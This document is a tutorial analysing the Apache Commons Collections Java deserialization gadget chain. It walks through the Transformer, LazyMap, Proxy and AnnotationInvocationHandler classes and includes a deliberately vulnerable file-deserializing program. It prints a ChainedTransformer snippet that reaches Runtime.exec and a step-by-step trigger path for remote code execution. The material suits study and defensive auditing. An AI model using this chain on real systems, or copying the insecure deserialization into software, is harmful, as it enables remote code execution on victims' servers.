# In-Depth Analysis of the Apache Commons Collections Gadget Chain
## Install the vulnerable JDK version and set up the environment
Download JDK 8u65 from the Java SE 8 archive at [oracle.com](https://www.oracle.com/asean/java/technologies/javase/javase8-archive-downloads.html).

Then run the `tar` command to extract it into the `jdks` folder.
```bash
tar -xzf jdk-8u65-linux-x64.tar.gz -C ./jdks/
```
Then install the "Extension Pack for Java" extension in Visual Studio Code. To use the extracted JDK, go to "User Settings" and type the following.

To create a simple Java project, open the Command Palette ("Ctrl + Shift + P"), choose "Java: Create Java Project...", and pick the Maven option.
> Apache Maven is a powerful project management and build automation tool used primarily for Java-based projects.
## Understand normal Java project
Typical Java project structure:
```
my-project/
├── src/
│   ├── main/
│   │   ├── java/            ← The Java source code (.java files)
│   │   │   └── com/example/app/
│   │   │       ├── Main.java
│   │   │       ├── models/
│   │   │       └── utils/
│   │   └── resources/       ← Config files, XML, properties
│   └── test/
│       └── java/            ← Unit tests
├── target/ (Maven) or build/ (Gradle)
│   └── *.jar                ← Compiled output (bytecode)
├── pom.xml                  ← Maven: dependency & build config
├── build.gradle             ← Gradle: alternative build config
└── README.md
```
- `pom.xml`: declares dependencies (libraries).
- `*.java`: the source code.
- `*.class`: compiled bytecode. It can be decompiled back to Java.
- `*.jar`: archive of `.class` files. This is the actual deployable app.
- `*.war` / `*.ear`: web app archives.
- `resources/`: config, XML, serialized objects. This folder often stores `.ser` files.

---
In Java, any class that implements the `Serializable` interface can be serialized. Deserializing such objects from untrusted input is what makes insecure deserialization vulnerabilities possible.
```java
import java.io.Serializable;

public class User implements Serializable {
    public String username;
    public String role;
}
```
Deserialization in Java happens when `ObjectInputStream.readObject()` is called. This call is the sink.
```java
ObjectInputStream ois = new ObjectInputStream(inputStream);
Object obj = ois.readObject(); // sink here
```
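To make the source-to-sink picture concrete, here is a minimal round-trip sketch. The class name `SerializationRoundTrip` and its helper methods are made up for illustration; the nested `User` mirrors the class shown earlier. It serializes an object to bytes and feeds those bytes back into `readObject()`.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

class SerializationRoundTrip {
    // Same shape as the User class above, nested so the file is self-contained.
    static class User implements Serializable {
        private static final long serialVersionUID = 1L;
        public String username;
        public String role;
    }

    // Turns an object into the byte format that readObject() consumes.
    static byte[] serialize(Object obj) throws IOException {
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bytes)) {
            oos.writeObject(obj);
        }
        return bytes.toByteArray();
    }

    // Rebuilds whatever object graph the bytes describe.
    static Object deserialize(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            return ois.readObject(); // sink
        }
    }

    public static void main(String[] args) throws Exception {
        User user = new User();
        user.username = "alice";
        user.role = "admin";

        byte[] data = serialize(user);
        // Java serialization streams start with the magic bytes AC ED 00 05.
        System.out.printf("%02X %02X %02X %02X%n",
                data[0] & 0xFF, data[1] & 0xFF, data[2] & 0xFF, data[3] & 0xFF);

        User copy = (User) deserialize(data);
        System.out.println(copy.username + " / " + copy.role);
    }
}
```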
---
## Java Web App Structure
```
webapp/
├── WEB-INF/
│   ├── web.xml      ← Servlet mappings (entry points)
│   ├── classes/     ← Compiled .class files
│   └── lib/         ← Bundled JARs (check for ysoserial gadget libs)
└── index.jsp
```
When auditing, look in the `lib/` folder for old versions of libraries with known gadget chains, such as `commons-collections` or `groovy`.

---
## Understand Apache Commons Collections Gadget Chain
### Transformer and its implementations
The Java Collections Framework was a major addition in Java 1.2. It added many powerful data structures that accelerate development of most significant Java applications. Since that time it has become the recognised standard for collection handling in Java.
Commons-Collections seeks to build upon the JDK classes by providing new interfaces, implementations and utilities.
One of them is the `Transformer` interface, which is used by transforming decorators that alter each object as it is added to a collection. Transformers are typically used for type conversions or for extracting data from an object.
```java
@FunctionalInterface
public interface Transformer<T, R> extends Function<T, R> {

    @Override
    default R apply(final T t) {
        return transform(t);
    }

    /**
     * Transforms the input object into some output object.
     * <p>
     * The input object SHOULD be left unchanged.
     * </p>
     *
     * @param input the object to be transformed, should be left unchanged
     * @return a transformed object
     * @throws ClassCastException (runtime) if the input is the wrong class
     * @throws IllegalArgumentException (runtime) if the input is invalid
     * @throws FunctorException (runtime) if the transform cannot be completed
     */
    R transform(T input);
}
```
`Transformer` is just a simple interface with a single abstract method, `transform`. The listing above comes from the current `collections4` sources; the 3.x line targeted by the ysoserial payload declares the same method without generics.
One implementation is `InvokerTransformer`, which uses reflection to call a named method on the input object and returns the result. Its source is at [InvokerTransformer.java](https://github.com/apache/commons-collections/blob/master/src/main/java/org/apache/commons/collections4/functors/InvokerTransformer.java).
The second one is `ConstantTransformer`, which ignores its input and returns the same constant each time. Its source is at [ConstantTransformer.java](https://github.com/apache/commons-collections/blob/master/src/main/java/org/apache/commons/collections4/functors/ConstantTransformer.java).
Another implementation is `ChainedTransformer`, which chains the specified transformers together: the output of step $N$ becomes the input of step $N+1$. Source code: [here](https://github.com/apache/commons-collections/blob/master/src/main/java/org/apache/commons/collections4/functors/ChainedTransformer.java).
Example of `ChainedTransformer`:
```java
Transformer[] chain = new Transformer[]{
    new ConstantTransformer(Runtime.class),   // always returns Runtime.class
    new InvokerTransformer("getMethod",       // calls Runtime.class.getMethod("getRuntime")
        new Class[]{String.class, Class[].class},
        new Object[]{"getRuntime", null}),
    new InvokerTransformer("invoke",          // calls the Method object → returns Runtime instance
        new Class[]{Object.class, Object[].class},
        new Object[]{null, null}),
    new InvokerTransformer("exec",            // calls runtime.exec("calc")
        new Class[]{String.class},
        new Object[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(chain);
chainedTransformer.transform("anything");     // triggers the whole chain
```
First, `ConstantTransformer(Runtime.class)` always returns `Runtime.class`, whatever its input. This is the output of step 1 and the input of step 2.
Then, `InvokerTransformer("getMethod", ...)` calls the `getMethod` method on `Runtime.class` with the argument "getRuntime". It produces the result of `Runtime.class.getMethod("getRuntime")`.
> Step 2 only returns a `Method` object describing `getRuntime`; it is not yet a `Runtime` instance.

At step 3, `InvokerTransformer("invoke", ...)` calls `invoke` on that `Method` object. Because `getRuntime` is static, the target is `null`, and the call returns the live `Runtime` instance.
Finally, the `Runtime` instance is passed to `InvokerTransformer("exec", ...)`, which calls its `exec` method with the parameter "calc".
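The four steps can also be reproduced with plain reflection, without Commons Collections on the classpath. The sketch below is only an approximation of what `InvokerTransformer.transform` does: the class `ReflectionChainSketch` and its `invoke` helper are hypothetical names, and the last step calls the harmless `availableProcessors` instead of `exec`.

```java
import java.lang.reflect.Method;

class ReflectionChainSketch {
    // Roughly what InvokerTransformer does: look up a public method by name and
    // parameter types on the input's class, then call it on the input.
    static Object invoke(Object input, String name, Class<?>[] paramTypes, Object[] args)
            throws Exception {
        Method method = input.getClass().getMethod(name, paramTypes);
        return method.invoke(input, args);
    }

    static Object runChain() throws Exception {
        // Step 1: the constant.
        Object step1 = Runtime.class;

        // Step 2: Runtime.class.getMethod("getRuntime") → a Method object.
        Object step2 = invoke(step1, "getMethod",
                new Class<?>[]{String.class, Class[].class},
                new Object[]{"getRuntime", new Class<?>[0]});

        // Step 3: getRuntimeMethod.invoke(null) → the Runtime instance.
        Object step3 = invoke(step2, "invoke",
                new Class<?>[]{Object.class, Object[].class},
                new Object[]{null, new Object[0]});

        // Step 4: a harmless call on the Runtime instance (the payload uses exec here).
        return invoke(step3, "availableProcessors", new Class<?>[0], new Object[0]);
    }

    public static void main(String[] args) throws Exception {
        System.out.println("availableProcessors = " + runChain());
    }
}
```

Each step only ever sees the previous step's output, which is why the chain has to start from a constant and walk through `Method` objects rather than calling `Runtime.getRuntime()` directly.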
### LazyMap
`LazyMap` is a `Map` wrapper. It decorates another `Map` to create objects in the map on demand.
In the `LazyMap` implementation, the `get` method is implemented as follows.
```java
@Override
public V get(final Object key) {
    // create value for key if key is not currently in the map
    if (!map.containsKey(key)) {
        @SuppressWarnings("unchecked")
        final K castKey = (K) key;
        final V value = factory.apply(castKey);
        map.put(castKey, value);
        return value;
    }
    return map.get(key);
}
```
When we call `.get(key)` and the key does not exist, `LazyMap` calls the factory's `apply` method to create the value. The `factory` field is declared as
```java
protected final Transformer<? super K, ? extends V> factory;
```
In the `Transformer` interface, the default `apply` method is
```java
@Override
default R apply(final T t) {
return transform(t);
}
```
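How `get` and `apply` fit together can be seen in a small stand-in. This is a sketch, not the library code: `MiniLazyMap` is a hypothetical class that copies only the lookup logic shown above and uses `java.util.function.Function` as the factory type.

```java
import java.util.HashMap;
import java.util.Map;
import java.util.function.Function;

class LazyMapSketch {
    // Hypothetical stand-in for LazyMap: asks a factory for values of missing keys.
    static class MiniLazyMap<K, V> {
        private final Map<K, V> map = new HashMap<>();
        private final Function<? super K, ? extends V> factory;

        MiniLazyMap(Function<? super K, ? extends V> factory) {
            this.factory = factory;
        }

        V get(K key) {
            if (!map.containsKey(key)) {
                V value = factory.apply(key); // whatever code the factory holds runs here
                map.put(key, value);
                return value;
            }
            return map.get(key);
        }
    }

    public static void main(String[] args) {
        int[] calls = {0};
        MiniLazyMap<String, String> lazy = new MiniLazyMap<>(key -> {
            calls[0]++;
            return "created for " + key;
        });

        System.out.println(lazy.get("missing")); // factory is called
        System.out.println(lazy.get("missing")); // value is already stored
        System.out.println("factory calls: " + calls[0]);
    }
}
```

Only the first lookup of a key reaches the factory; later lookups find the stored value.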
Interesting: when a key does not exist, `LazyMap` calls `factory.transform(key)`. Recall from the previous section that a `ChainedTransformer` can reach `Runtime.exec` through its `transform` method.
So, by using a `ChainedTransformer` as the factory of a `LazyMap`, any `get` on a missing key leads to RCE.

---
## Understand Java Proxy
`Proxy` provides static methods for creating objects that act like instances of interfaces but allow for customized method invocation. In other words, a Java proxy is a stand-in object that intercepts every method call and redirects it to a handler. Read more in [Anatomy of a Java Proxy](https://marschall.github.io/2017/07/11/java-proxy-anatomy.html).
To understand how proxies work in Java, we need two types: the [java.lang.reflect.Proxy](https://docs.oracle.com/javase/8/docs/api/java/lang/reflect/Proxy.html) class (the superclass of all proxies, which also creates new proxy instances) and the [java.lang.reflect.InvocationHandler](https://docs.oracle.com/javase/8/docs/api/java/lang/reflect/InvocationHandler.html) interface (the handler called by the generated proxy).
A new proxy instance is created with `Proxy.newProxyInstance`, which is implemented as follows.
```java
/**
 * @param loader the class loader to define the proxy class, may be
 *               null to represent the bootstrap class loader
 * @param interfaces the list of interfaces for the proxy class
 *                   to implement
 * @param h the invocation handler to dispatch method invocations to
 * @return a proxy instance with the specified invocation handler of a
 *         proxy class that is defined by the specified class loader
 *         and that implements the specified interfaces
 */
public static Object newProxyInstance(ClassLoader loader,
                                      Class<?>[] interfaces,
                                      InvocationHandler h) {
    Objects.requireNonNull(h);
    /*
     * Look up or generate the designated proxy class and its constructor.
     */
    Constructor<?> cons = getProxyConstructor(loader, interfaces);
    return newProxyInstance(cons, h);
}

private static Object newProxyInstance(Constructor<?> cons, InvocationHandler h) {
    /*
     * Invoke its constructor with the designated invocation handler.
     */
    try {
        return cons.newInstance(new Object[]{h});
    } catch (IllegalAccessException | InstantiationException e) {
        throw new InternalError(e.toString(), e);
    } catch (InvocationTargetException e) {
        Throwable t = e.getCause();
        if (t instanceof RuntimeException re) {
            throw re;
        } else {
            throw new InternalError(t.toString(), t);
        }
    }
}
```
The handler `h` is passed to the constructor of the generated proxy class, and the generated class forwards every method call on the proxy instance to that implementation of the `InvocationHandler` interface.
```java
public interface InvocationHandler {
    /**
     * Processes a method invocation on a proxy instance and returns
     * the result. This method will be invoked on an invocation handler
     * when a method is invoked on a proxy instance that it is
     * associated with.
     */
    public Object invoke(Object proxy, Method method, Object[] args)
        throws Throwable;
    ...
}
```
As the Javadoc of `InvocationHandler` states, the handler's `invoke` method is called whenever a method is called on the proxy instance.
An example:
```java
// Create a proxy for Map
Map proxyMap = (Map) Proxy.newProxyInstance(
    Map.class.getClassLoader(),
    new Class[]{Map.class},
    handler // an InvocationHandler instance
);
// Any method called on proxyMap goes to handler.invoke()
proxyMap.entrySet(); // doesn't run a real entrySet(), but calls handler.invoke() instead
proxyMap.get("x");   // calls handler.invoke()
proxyMap.size();     // calls handler.invoke()
```
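The snippet above leaves `handler` undefined. A runnable variant might look like the following sketch, where `ProxyDemo` and `recordingMap` are hypothetical names and the handler does nothing except record which method was intercepted.

```java
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;

class ProxyDemo {
    // Builds a Map proxy whose handler only records the name of each intercepted method.
    static Map<?, ?> recordingMap(List<String> calls) {
        InvocationHandler handler = (proxy, method, args) -> {
            calls.add(method.getName());
            // The returned value must fit the declared return type of the method.
            Class<?> type = method.getReturnType();
            if (type == int.class) return 0;
            if (type == boolean.class) return false;
            return null;
        };
        return (Map<?, ?>) Proxy.newProxyInstance(
                Map.class.getClassLoader(),
                new Class<?>[]{Map.class},
                handler);
    }

    public static void main(String[] args) {
        List<String> calls = new ArrayList<>();
        Map<?, ?> proxyMap = recordingMap(calls);

        proxyMap.entrySet();
        proxyMap.get("x");
        proxyMap.size();

        System.out.println(calls); // [entrySet, get, size]
    }
}
```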
---
## Understand the Payload
We can use [ysoserial](https://github.com/frohoff/ysoserial) to create the payload for the Commons Collections library.
If we dump the payload using a third-party tool (I use `SerializationDumper`), we can see that it uses
1. `AnnotationInvocationHandler`
2. `LazyMap`
3. `ChainedTransformer`
4. `InvokerTransformer`
5. `ConstantTransformer`

The call chain is as follows.
```
readObject()
│
▼
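AnnotationInvocationHandler.readObject()
│ calls memberValues.entrySet() (memberValues is a Map proxy)
▼
AnnotationInvocationHandler.invoke() ← Handler of the proxy (a second instance)
│ calls memberValues.get("entrySet") (memberValues is the LazyMap)
▼
LazyMap.get(key) ← Triggers the transformer
│ key not in map → calls factory.transform(key)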
▼
ChainedTransformer.transform() ← Runs transformers in sequence
│
├─► ConstantTransformer.transform() → returns Runtime.class (ignores input)
│
├─► InvokerTransformer.transform() → Runtime.class.getMethod("getRuntime")
│
├─► InvokerTransformer.transform() → getRuntime.invoke(null) = Runtime instance
│
├─► InvokerTransformer.transform() → runtime.exec("calc.exe")
│
▼
calc.exe launches
```
Have you ever wondered why these classes are used?
First, we need to understand the `readObject()` function.
```
Serializable classes that require special handling during the
serialization and deserialization process should implement the following
methods:
* private void writeObject(java.io.ObjectOutputStream stream)
* throws IOException;
* private void readObject(java.io.ObjectInputStream stream)
* throws IOException, ClassNotFoundException;
* private void readObjectNoData()
* throws ObjectStreamException;
```
So a class can define its own private `readObject()` to customize how its instances are deserialized.
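A small sketch shows the hook in action. `ReadObjectHook` and `Noisy` are hypothetical names used only for this illustration; the point is that `ObjectInputStream` finds and calls the private `readObject` on its own, without any application code invoking it.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

class ReadObjectHook {
    static class Noisy implements Serializable {
        private static final long serialVersionUID = 1L;
        static int hookCalls = 0; // static, so not part of the serialized state
        String label = "demo";

        // Found and called reflectively by ObjectInputStream during deserialization.
        private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
            in.defaultReadObject(); // restore the regular fields first
            hookCalls++;
            System.out.println("custom readObject ran, label=" + label);
        }
    }

    // Serializes the object to memory and immediately deserializes it again.
    static Object roundTrip(Object obj) throws IOException, ClassNotFoundException {
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bytes)) {
            out.writeObject(obj);
        }
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(bytes.toByteArray()))) {
            return in.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        roundTrip(new Noisy());
        System.out.println("hook calls: " + Noisy.hookCalls);
    }
}
```

Any logic placed in such a method runs as a side effect of `ois.readObject()`, before the caller even receives the object.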
That means we need to find a class that implements `Serializable`, has a custom `readObject()` method, and calls a method on a map field inside that `readObject()` (a field we can replace with our own map to trigger RCE).
`AnnotationInvocationHandler` fits perfectly. Its implementation is as follows.
```java
class AnnotationInvocationHandler implements InvocationHandler, Serializable {
    ...
    private final Map<String, Object> memberValues;
    ...
    private void readObject(java.io.ObjectInputStream s)
        throws java.io.IOException, ClassNotFoundException {
        ...
        Map<String, Object> streamVals = (Map<String, Object>)fields.get("memberValues", null);
        ...
        // If there are annotation members without values, that
        // situation is handled by the invoke method.
        for (Map.Entry<String, Object> memberValue : streamVals.entrySet()) {
            ...
        }
    }
}
```
In its custom `readObject` method, `AnnotationInvocationHandler` calls `entrySet` on `streamVals`, which is read from the `memberValues` field in the serialized bytes. Note that this listing matches newer JDK sources; older builds such as 8u65 should iterate over `memberValues.entrySet()` directly after `defaultReadObject()`.
If we can replace `memberValues` with a map proxy, the `entrySet` call is redirected to the `invoke()` method of the proxy's handler. The question is which invocation handler to set for the map proxy so that calling `invoke` triggers the chain.
Let's look at the `invoke` method of `AnnotationInvocationHandler`.
```java
public Object invoke(Object proxy, Method method, Object[] args) {
String member = method.getName();
...
Object result = memberValues.get(member);
...
}
```
Hmm, it calls `memberValues.get(member)`. What if `memberValues` is a `LazyMap`? The key `"entrySet"` is not in the map, so the lookup triggers the RCE chain.
That means the invocation handler for the map proxy must be a second `AnnotationInvocationHandler` object, whose `memberValues` attribute is the `LazyMap`.
Done! We have understood all the pieces.
A full picture:
```
AIH = AnnotationInvocationHandler
Attacker builds:
AIH { memberValues = proxyMap (InvocationHandler = AIH_2 { memberValues = LazyMap} ) }
↓
Serializes it to bytes
↓
Sends bytes to victim
Victim's server:
ois.readObject()
→ Java sees: class is AIH and has custom readObject()
→ Java calls: AIH.readObject()
→ this.memberValues.entrySet()
→ Proxy intercepts
→ AIH_2.invoke()
→ lazyMap.get()
→ ChainedTransformer
→ Runtime.exec("calc") ← RCE
```
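The trigger path in the picture can be exercised end to end with harmless stand-ins. Everything in the sketch below is hypothetical and only mimics the real classes: `Handler` plays the role of `AnnotationInvocationHandler` (both the outer and the inner instance), and `LoggingLazyMap` replaces `LazyMap` plus `ChainedTransformer` by writing a log entry instead of running a command.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;
import java.lang.reflect.Proxy;
import java.util.ArrayList;
import java.util.Collections;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.Set;

class TriggerPathSketch {
    // Records what happens during deserialization instead of executing anything.
    static final List<String> LOG = new ArrayList<>();

    // Stand-in for LazyMap + ChainedTransformer: a missing key "fires the payload".
    static class LoggingLazyMap extends HashMap<String, Object> {
        private static final long serialVersionUID = 1L;

        @Override
        public Object get(Object key) {
            if (!containsKey(key)) {
                LOG.add("payload would run for key " + key);
                return null;
            }
            return super.get(key);
        }
    }

    // Stand-in for AnnotationInvocationHandler: serializable, readObject() calls
    // entrySet() on its map, and invoke() calls get(methodName) on its map.
    static class Handler implements InvocationHandler, Serializable {
        private static final long serialVersionUID = 1L;
        private final Map<String, Object> memberValues;

        Handler(Map<String, Object> memberValues) {
            this.memberValues = memberValues;
        }

        @Override
        public Object invoke(Object proxy, Method method, Object[] args) {
            LOG.add("invoke(" + method.getName() + ")");
            Object result = memberValues.get(method.getName());
            // entrySet() must return a Set, so hand back an empty one.
            return method.getReturnType() == Set.class ? Collections.emptySet() : result;
        }

        private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
            in.defaultReadObject();
            LOG.add("readObject");
            memberValues.entrySet();
        }
    }

    @SuppressWarnings("unchecked")
    static List<String> run() throws IOException, ClassNotFoundException {
        Handler inner = new Handler(new LoggingLazyMap()); // plays AIH_2
        Map<String, Object> proxyMap = (Map<String, Object>) Proxy.newProxyInstance(
                TriggerPathSketch.class.getClassLoader(), new Class<?>[]{Map.class}, inner);
        Handler outer = new Handler(proxyMap);             // plays AIH

        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bytes)) {
            out.writeObject(outer);
        }
        LOG.clear(); // keep only what happens on the "victim" side
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(bytes.toByteArray()))) {
            in.readObject();
        }
        return new ArrayList<>(LOG);
    }

    public static void main(String[] args) throws Exception {
        // Expected order: readObject (inner), readObject (outer),
        // invoke(entrySet), payload would run for key entrySet
        run().forEach(System.out::println);
    }
}
```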
---
## Debug Insecure-Deserialization project
Prepare a simple program that reads and deserializes an object from a file.
```java
// src/main/java/com/example/Main.java
package com.example;

import java.io.FileInputStream;
import java.io.ObjectInputStream;
import java.util.Scanner;

public class Main {
    public Main() {
    }

    public static void main(String[] args) {
        Scanner scanner = new Scanner(System.in);
        System.out.println("Enter filename to deserialize:");
        String filename = scanner.nextLine();
        scanner.close();
        try {
            // Opens the file as a raw byte stream
            FileInputStream fileInputStream = new FileInputStream(filename);
            // Wraps the byte stream in an ObjectInputStream: this is the class that
            // knows how to reconstruct Java objects from bytes
            ObjectInputStream objectInputStream = new ObjectInputStream(fileInputStream);
            // Performs the deserialization; the sink here
            Object obj = objectInputStream.readObject();
            objectInputStream.close();
            fileInputStream.close();
            System.out.println("Deserialized object: " + obj.toString());
        } catch (Exception e) {
            System.err.println("Error during deserialization: " + e.getMessage());
        }
    }
}
```
With the vulnerable environment set up, we can now debug the chain flow using `Run and Debug` in VS Code. Set a breakpoint at `Object obj = objectInputStream.readObject();`.
Many blog posts walk through debugging this payload; refer to them for the detailed debug flow.
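Before loading a real payload, it can help to confirm that the breakpoint is hit with a harmless file. The sketch below is an assumption about how one might do that: `MakeBenignSer` and the default file name `benign.ser` are made up, and the file contains nothing but a serialized `ArrayList` of strings.

```java
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.util.ArrayList;
import java.util.List;

class MakeBenignSer {
    // Writes a small, harmless object graph in Java serialization format.
    static void write(String path) throws IOException {
        List<String> data = new ArrayList<>();
        data.add("hello");
        data.add("deserialization");
        try (ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(path))) {
            out.writeObject(data);
        }
    }

    public static void main(String[] args) throws IOException {
        String path = args.length > 0 ? args[0] : "benign.ser";
        write(path);
        System.out.println("Wrote " + path);
    }
}
```

Entering the path of the generated file at the prompt of `Main` should stop at the breakpoint and then print the list, which makes it easier to tell setup problems apart from payload problems.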